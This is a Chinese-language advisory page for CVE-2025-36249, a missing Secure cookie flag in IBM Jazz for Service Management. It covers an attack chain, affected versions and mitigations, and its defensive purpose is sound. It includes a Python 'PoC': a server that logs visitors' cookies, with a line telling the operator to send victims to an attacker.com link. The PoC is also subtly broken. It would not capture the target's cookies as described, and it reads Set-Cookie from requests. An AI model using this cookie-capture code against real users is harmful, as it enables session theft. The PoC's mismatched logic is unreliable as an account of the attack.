CVE-2025-36249 IBM Jazz for Service Management 安全Cookie未设置Secure属性漏洞

漏洞信息

漏洞编号

CVE-2025-36249

漏洞类型

安全Cookie配置缺陷

CVSS评分

3.7 低危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

IBM Jazz for Service Management

漏洞概述

CVE-2025-36249是IBM Jazz for Service Management中的一个安全配置漏洞。该漏洞存在于1.1.3.0至1.1.3.25版本中，主要问题是在授权令牌和会话Cookie的创建过程中，未能正确设置Secure属性。Secure属性是Cookie安全机制的重要组成部分，当Cookie设置此属性后，浏览器只会通过HTTPS加密连接发送该Cookie，从而防止敏感认证信息在传输过程中被窃取。由于该漏洞的存在，即使服务器同时支持HTTP和HTTPS协议，用户通过HTTP链接访问时，敏感的身份验证Cookie也会以明文形式传输。攻击者可以利用这一缺陷，通过社会工程学手段诱骗用户访问恶意HTTP链接，或者在用户常访问的网站上植入恶意链接，从而截获用户的会话Cookie。成功获取Cookie后，攻击者可以在无需凭据的情况下冒充合法用户身份，进而访问系统资源、执行未授权操作或窃取敏感数据。

技术细节

该漏洞的根本原因在于IBM Jazz for Service Management在生成会话Cookie时，缺少对Secure标志位的设置。在标准的Web安全实践中，当应用程序通过HTTPS提供服务时，所有包含敏感信息的Cookie都应当设置Secure属性，确保Cookie只能通过加密通道传输。然而，受影响版本的应用服务器在处理HTTP请求时，同样会返回包含会话标识符的Cookie，且这些Cookie未标记Secure属性。攻击者实施攻击的基本原理如下：首先，攻击者构造一个HTTP链接（而非HTTPS），该链接指向IBM Jazz for Service Management的登录页面或任何需要认证的端点；然后，攻击者通过钓鱼邮件、即时消息或在被植入恶意代码的网站上呈现这个HTTP链接；当目标用户点击该链接时，浏览器会向HTTP端点发送请求，此时未设置Secure属性的Cookie会随着HTTP请求头以明文形式传输；最后，处于网络监听位置的攻击者（如同一WiFi网络、ISP级别或代理服务器）可以使用中间人攻击技术捕获这些明文Cookie。由于会话Cookie包含有效的用户认证信息，攻击者可以直接使用该Cookie值来建立自己的会话，实现对用户账户的劫持。

攻击链分析

STEP 1

步骤1: 构造恶意HTTP链接

攻击者将IBM Jazz for Service Management的正常HTTPS URL转换为HTTP版本，构造指向受影响服务器的恶意链接

STEP 2

步骤2: 社会工程攻击

攻击者通过钓鱼邮件、即时通讯软件或在被植入恶意代码的网站上向目标用户发送或展示该HTTP链接，诱骗用户点击访问

STEP 3

步骤3: Cookie明文传输

当用户访问HTTP链接时，由于Cookie未设置Secure属性，浏览器会自动在HTTP请求头中以明文形式发送会话Cookie

STEP 4

步骤4: 网络嗅探截获

处于网络中间位置的攻击者（如同一网络环境、恶意WiFi热点或被入侵的路由器）使用抓包工具或中间人攻击技术捕获明文传输的Cookie

STEP 5

步骤5: 会话劫持

攻击者将截获的Cookie值注入到自己的浏览器请求中，冒充合法用户身份建立新的会话，从而获得对系统的未授权访问权限

STEP 6

步骤6: 权限滥用

攻击者利用劫持的会话执行各种未授权操作，包括访问敏感数据、修改配置信息或执行特权操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-36249 PoC - Cookie Hijacking via HTTP
# This PoC demonstrates how an attacker can capture cookies when Secure attribute is missing

import http.server
import socketserver
import urllib.parse
import json
from datetime import datetime

class CookieSniffer(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        """Handle incoming HTTP requests and log cookies"""
        # Parse cookies from request headers
        cookies = self.headers.get('Cookie', '')
        cookies += ';' + self.headers.get('Set-Cookie', '')
        
        # Log captured information
        log_entry = {
            'timestamp': datetime.now().isoformat(),
            'source_ip': self.client_address[0],
            'path': self.path,
            'cookies': cookies,
            'user_agent': self.headers.get('User-Agent', 'Unknown')
        }
        
        print(f"[*] Captured request from {log_entry['source_ip']}")
        print(f"[*] Cookies: {cookies}")
        
        # Save to log file
        with open('captured_cookies.json', 'a') as f:
            f.write(json.dumps(log_entry) + '\n')
        
        # Send response to keep connection alive
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()
        self.wfile.write(b'<html><body>Loading...</body></html>')

def generate_malicious_link(target_url):
    """Generate HTTP link to capture cookies"""
    # Convert HTTPS URL to HTTP for the attack
    attack_link = target_url.replace('https://', 'http://')
    return attack_link

def simulate_cookie_hijack(cookie_value):
    """Simulate session hijacking using captured cookie"""
    # This would be used to make authenticated requests
    headers = {
        'Cookie': cookie_value,
        'User-Agent': 'Mozilla/5.0 (compatible; SecurityScanner/1.0)'
    }
    return headers

if __name__ == '__main__':
    PORT = 8080
    print(f"[*] Starting Cookie Sniffer on port {PORT}")
    print(f"[*] Send this link to victim: http://attacker.com:8080/malicious")
    with socketserver.TCPServer(("", PORT), CookieSniffer) as httpd:
        httpd.serve_forever()

影响范围

IBM Jazz for Service Management 1.1.3.0

IBM Jazz for Service Management 1.1.3.1

IBM Jazz for Service Management 1.1.3.2

IBM Jazz for Service Management 1.1.3.3

IBM Jazz for Service Management 1.1.3.4

IBM Jazz for Service Management 1.1.3.5

IBM Jazz for Service Management 1.1.3.6

IBM Jazz for Service Management 1.1.3.7

IBM Jazz for Service Management 1.1.3.8

IBM Jazz for Service Management 1.1.3.9

IBM Jazz for Service Management 1.1.3.10

IBM Jazz for Service Management 1.1.3.11

IBM Jazz for Service Management 1.1.3.12

IBM Jazz for Service Management 1.1.3.13

IBM Jazz for Service Management 1.1.3.14

IBM Jazz for Service Management 1.1.3.15

IBM Jazz for Service Management 1.1.3.16

IBM Jazz for Service Management 1.1.3.17

IBM Jazz for Service Management 1.1.3.18

IBM Jazz for Service Management 1.1.3.19

IBM Jazz for Service Management 1.1.3.20

IBM Jazz for Service Management 1.1.3.21

IBM Jazz for Service Management 1.1.3.22

IBM Jazz for Service Management 1.1.3.23

IBM Jazz for Service Management 1.1.3.24

IBM Jazz for Service Management 1.1.3.25

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：首先，强制所有用户仅通过HTTPS访问IBM Jazz for Service Management，在Web服务器层面配置HTTP到HTTPS的强制重定向；其次，在反向代理或负载均衡器上添加Cookie安全检查规则，拒绝未设置Secure属性的Cookie响应；此外，监控网络流量，检测异常的HTTP明文认证请求；最后，对用户进行安全意识培训，提醒用户不要点击来源不明的链接，特别是HTTP链接。如果可能，临时关闭HTTP访问端口，仅允许HTTPS连接。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-36249
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-36249
3 Details https://www.cvedetails.com/cve/CVE-2025-36249/
4 VulDB https://vuldb.com/cve/CVE-2025-36249
5 Link https://www.ibm.com/support/pages/node/7249820